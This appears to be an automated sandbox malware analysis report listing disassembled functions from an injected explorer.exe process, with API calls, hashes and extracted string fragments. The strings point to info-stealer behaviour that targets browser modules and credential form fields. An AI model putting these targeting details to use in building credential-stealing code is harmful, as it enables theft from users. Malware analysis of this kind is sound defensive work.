                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: send
                                                    • API String ID: 2809346765-2809346765
                                                    • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                    • Instruction ID: 0cfa5073a0c2e7e1919dbaa474929e0c79bcf6c4263e0d7e779bba087bd29c23
                                                    • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                    • Instruction Fuzzy Hash: 0501127061CA188FDB84EF5CD049B2577E0EB58314F1645AED85DCB266C670DC858B85
                                                    Function 0E4D75B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 416 e4d75b2-e4d75ea 417 e4d75ec-e4d7604 call e4da942 416->417 418 e4d760a-e4d762b socket 416->418 417->418
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: sock
                                                    • API String ID: 98920635-2415254727
                                                    • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                    • Instruction ID: 52338d8e4ed7173a61fb96253fdb4a7c23469fd1a8d19c0b3a7bb51e847a73c8
                                                    • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                    • Instruction Fuzzy Hash: B1017C30618A188FCB84EF1CE048B50BBE0FB59314F1545AEE80ECB226D7B0C9858B86
                                                    Function 0E4CF2DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 421 e4cf2dd-e4cf320 call e4da942 424 e4cf3fa-e4cf40e 421->424 425 e4cf326 421->425 426 e4cf328-e4cf339 SleepEx 425->426 426->426 427 e4cf33b-e4cf341 426->427 428 e4cf34b-e4cf352 427->428 429 e4cf343-e4cf349 427->429 431 e4cf354-e4cf35a 428->431 432 e4cf370-e4cf376 428->432 429->428 430 e4cf35c-e4cf36a call e4d9f12 429->430 430->432 431->430 431->432 434 e4cf378-e4cf37e 432->434 435 e4cf3b7-e4cf3bd 432->435 434->435 437 e4cf380-e4cf38a 434->437 438 e4cf3bf-e4cf3cf call e4cfe72 435->438 439 e4cf3d4-e4cf3db 435->439 437->435 442 e4cf38c-e4cf3b1 call e4d0432 437->442 438->439 439->426 441 e4cf3e1-e4cf3f5 call e4cf0f2 439->441 441->426 442->435
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                    • Instruction ID: 25d020337ab49c6ef6dac3127a1c2dcbcf4c8c5d313aaef7ccd61f7cfc082f6c
                                                    • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                    • Instruction Fuzzy Hash: 93318F78614B09EFCBA4DF6A80582A6B7E2FB44300F44467FC91DC7216C7789859CF91
                                                    Function 0E4CF412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 457 e4cf412-e4cf446 call e4da942 460 e4cf448-e4cf472 call e4dcc9e CreateThread 457->460 461 e4cf473-e4cf47d 457->461
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4452293523.000000000E450000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_e450000_explorer.jbxd
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                    • Instruction ID: cd79fc34891f5e6a7537583f3bc89d46798a621262ff2c3dd2fa73f1124540ad
                                                    • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                    • Instruction Fuzzy Hash: 53F0C230268A484FD788EF2CD49563AF3D0EBA9215F450A3FA54DC3264DA69C9818716

                                                    Non-executed Functions

                                                    Function 1060ED02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                    • API String ID: 0-393284711
                                                    • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                    • Instruction ID: 51c8af2c41796cfee720833fc57c62f2a00052dacdfe75f14b675e272b21b302
                                                    • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                    • Instruction Fuzzy Hash: 4FE18A74618F488FC7A4DF28C4857AAB7E0FB98300F504A2EA59BCB255DF34A541CB89
                                                    Function 10611792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                    • API String ID: 0-2916316912
                                                    • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                    • Instruction ID: 1743b38f96bd59d5f1a114e498c78864e3bcd70ca3595ed57b479430cf416192
                                                    • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                    • Instruction Fuzzy Hash: 5AB18B30518B488EDB95EF68C486AEEB7F1FF98300F50451EE49ACB251EF70A545CB86
                                                    Function 1060F622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                    • API String ID: 0-1539916866
                                                    • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                    • Instruction ID: e10ee81c0943086bf56d644cd8f628e7f77c02e5fe720d77f8daf40fb44b6f6a
                                                    • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                    • Instruction Fuzzy Hash: 1941B370A18B08CFDB58DF88A4467BE7BE6FB88700F00025EE449D7245DBB5AD458BD6
                                                    Function 10616AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                    • API String ID: 0-355182820
                                                    • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                    • Instruction ID: c60a1afb94510b569c216db32fc1b5f945912867d9d282f1764512bd2d998a0f
                                                    • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                    • Instruction Fuzzy Hash: A4C14D78618B099FC798EF24D4856DAF7E1FB98304F40472EA49AC7250DF30B555CB8A
                                                    Function 10616F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                    • API String ID: 0-97273177
                                                    • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                    • Instruction ID: 2d92edeb79bf8506a6f0c7d94738323983aea59e238343167f02dbdf70b16843
                                                    • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                    • Instruction Fuzzy Hash: 9751A17551C7488FD749CF18D8816AAB7E5FBC5700F501A2EF8CB8B241DBB4A946CB82
                                                    Function 106102F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                    • API String ID: 0-639201278
                                                    • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                    • Instruction ID: f24ef737f553cd13b84213adb469b797a883856b12591e17b0e3cafa066e79db
                                                    • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                    • Instruction Fuzzy Hash: 8CC1B474619A198FC788EF68D4966EAB3E1FBD8300F404369A44ECB254DF70E941CBC9
                                                    Function 106102F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                    • API String ID: 0-639201278
                                                    • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                    • Instruction ID: 29b66033dc7091ab4ecd1e44fd5540a40ce3224de6ee435a3a129dbeec526160
                                                    • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                    • Instruction Fuzzy Hash: 1BC1B474619A198FC788EF68D4966EAB3E1FBD4300F404369A44ECB254DF70E941C7C9
                                                    Function 10611CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                    • API String ID: 0-2058692283
                                                    • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                    • Instruction ID: 2aa4170696ef932bee5c729debe9bf3a205b85fd6196afb0ba62e28bd9128e2e
                                                    • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                    • Instruction Fuzzy Hash: 00A1BF706187488FDB59DFA894457EEB7E1FF88300F00462EE48ADB291EF709586C789
                                                    Function 10611CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                    • API String ID: 0-2058692283
                                                    • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                    • Instruction ID: f8b18995b48df526b376439ec1f89d353eb8cfd69532446a7ef13d204bf541b1
                                                    • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                    • Instruction Fuzzy Hash: B2918D706187488FDB59DFA8D444BEEB7E1FB98300F40462EE48ADB291EF7095858789
                                                    Function 10611352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$e$n$v
                                                    • API String ID: 0-1849617553
                                                    • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                    • Instruction ID: 17c7dda566fee56dadad708e39e22f5880cea4896ff0f4af64d6a45944f0801a
                                                    • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                    • Instruction Fuzzy Hash: BD71B571618B488FD758DF68C4857AAB7F1FF98304F00062EE44ACB261EF70E9858B85
                                                    Function 1060CC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2.dl$dll$l32.$ole3$shel
                                                    • API String ID: 0-1970020201
                                                    • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                    • Instruction ID: 09f1ca3e18d528dbe74d080a5c2ce10d4a6aa5e3e8b17828bb3a3d5629a6774c
                                                    • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                    • Instruction Fuzzy Hash: B15140B0918B4C8FDB94DF64C0456EEB7F1FF58300F40462EA49AE7254EF70A5858B89
                                                    Function 1060D86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4$\$dll$ion.$vers
                                                    • API String ID: 0-1610437797
                                                    • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                    • Instruction ID: c40a969eedee9c29022d5ee44cfee24a9cd429272ca7d2625dfb026c5ddc87b8
                                                    • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                    • Instruction Fuzzy Hash: A7416134259B488FCBA9EF24D8457EEB3E4FB98301F41462E985EC7244EF30D5458782
                                                    Function 1060F4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 32.d$cli.$dll$sspi$user
                                                    • API String ID: 0-327345718
                                                    • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                    • Instruction ID: 3fbc3ee86b3c65ba78401c0ad2419e5ef38ddc2513530ab3aa4ee4d05637c369
                                                    • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                    • Instruction Fuzzy Hash: 0041A130A59E0D8FCBD9EF68C4953ED73E1FBA8300F50056AA80ED7214DA30D9808BC6
                                                    Function 1060D432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .dll$el32$h$kern
                                                    • API String ID: 0-4264704552
                                                    • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                    • Instruction ID: 1d25497fe3bae89923fc3a63c525a074cc18eb4f6b745464c22bb8684dfc324c
                                                    • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                    • Instruction Fuzzy Hash: 44419270608B4D8FD799DF2884843AAB7E1FBA8304F104B2E949EC3255DB70D945CB85
                                                    Function 106140B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $Snif$f fr$om:
                                                    • API String ID: 0-3434893486
                                                    • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                    • Instruction ID: 8a94a59e6731a46e3892b3200242bf8ba21d1fa999b40ff026305e9ea3a62689
                                                    • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                    • Instruction Fuzzy Hash: EC31043551DB886FC75ADB28C0856EAB7D4FBD4300F50491EE49BCB291EE30A58ACB47
                                                    Function 106140C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $Snif$f fr$om:
                                                    • API String ID: 0-3434893486
                                                    • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                    • Instruction ID: c90bee2e0c277a93705b966eba27b6096239261b9be428eca098c10e4da0b631
                                                    • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                    • Instruction Fuzzy Hash: 04310135409B486FC359DB28C4866EAB3D4FBD4300F50491EE49BCB281EE30E58ACA46
                                                    Function 1060FFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .dll$chro$hild$me_c
                                                    • API String ID: 0-3136806129
                                                    • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                    • Instruction ID: bc58e7c2bbf377f5998c8c4d868d975e94f81f012a4a356bce40f64b1374eed1
                                                    • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                    • Instruction Fuzzy Hash: 33317074219B484FCBC4DF688495BAAB7E1FBD8300F84466DA44ECB214DF30D945C796
                                                    Function 1060FFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .dll$chro$hild$me_c
                                                    • API String ID: 0-3136806129
                                                    • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                    • Instruction ID: 1b9280a8e501955e282cd89b44be8ebe8ad1128f415f30887a2c7e6b6a82b189
                                                    • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                    • Instruction Fuzzy Hash: 02317074219B484FCBC4DF688495BAAB7E1FFD8300F84466DA44ACB254DF30D945CB9A
                                                    Function 106128C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                    • API String ID: 0-319646191
                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                    • Instruction ID: 8e4b33473154de333cc9a196684db330b54c87f9895b879ed12c9efe6844af80
                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                    • Instruction Fuzzy Hash: 5231E371614A4D8FCB44EFA8C8857EDB7E0FF98205F40422AE45EDB240DF789685C799
                                                    Function 106128BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                    • API String ID: 0-319646191
                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                    • Instruction ID: 5b995545bb36439b072d71e8b452389720a45da0e7263e316885b037097ac8ad
                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                    • Instruction Fuzzy Hash: AC210670A10A4D8FCB44DFA9C8857EDBBF0FF98204F40421AE45ADB240DF749684C799
                                                    Function 10613E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$l$l$t
                                                    • API String ID: 0-168566397
                                                    • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                    • Instruction ID: 441cf877cbb943bb571059dd57ecf12cf2f2083454c8cfa8756ee83860c5cd34
                                                    • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                    • Instruction Fuzzy Hash: B4217C74A24A0D9FDB44EFA8D0457AEBAF0FF98300F50462EE009D7600DB74A591CB98
                                                    Function 10613E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$l$l$t
                                                    • API String ID: 0-168566397
                                                    • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                    • Instruction ID: d9bcfba42b0c51cba61e655077318563c4fb63d626848383f89b28360067da15
                                                    • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                    • Instruction Fuzzy Hash: 7C218D74A24A0D9BDB44EFA8D0457EDBBF0FF58300F50462EE009D7600DB74A591CB98
                                                    Function 10613FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4453470539.0000000010600000.00000040.00000001.00040000.00000000.sdmp, Offset: 10600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10600000_explorer.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: auth$logi$pass$user
                                                    • API String ID: 0-2393853802
                                                    • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                    • Instruction ID: 7f5b3e110cb93f0917d994d2f8f0ad0ee857967bd0d31623a7c22b31d53bb7b3
                                                    • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                    • Instruction Fuzzy Hash: 3B21CD30624B0D8BCB45CF9998816DEB7F1EFC8354F004619E40AEB344DBB0E9948BD6

                                                    Execution Graph

                                                    Execution Coverage:1.6%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:619
                                                    Total number of Limit Nodes:78
